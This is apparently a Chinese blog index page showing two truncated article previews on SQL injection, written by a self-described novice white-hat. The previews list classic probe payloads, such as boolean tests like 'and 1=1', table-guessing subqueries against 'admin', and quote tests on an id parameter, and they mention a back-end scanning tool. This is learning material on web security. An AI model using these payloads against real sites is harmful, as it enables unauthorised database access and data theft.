SQL注入
一颗小松子.
一个正在努力的小白帽
展开
-
SQL注入语句特征
SQL注入语句特征1.判断有无注入点; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等…and 0<>(select count(*) from *)and 0<>(select count(*) from admin) --判断是否存在admin这张表3.猜帐号数目如果遇到0< 返回正确页面1<返回错误页面,说明帐号数目就是1个and 0<(sel原创 2021-01-25 20:43:59 · 2744 阅读 · 0 评论 -
SQL注入概述及使用
SQL注入御剑扫描网站后台SQL注入点的判断?id=35 +1/-1select * from tbName where id=$id?id=35' 字符型还是数字型near ''' at line 1select * from tbName where id=35'?id=35 and 1=1 是否有布尔类型的状态?id=35 and 1=2select * from tbName where id=35 and 1=1select * from tbName where id=35原创 2021-01-25 11:22:32 · 301 阅读 · 0 评论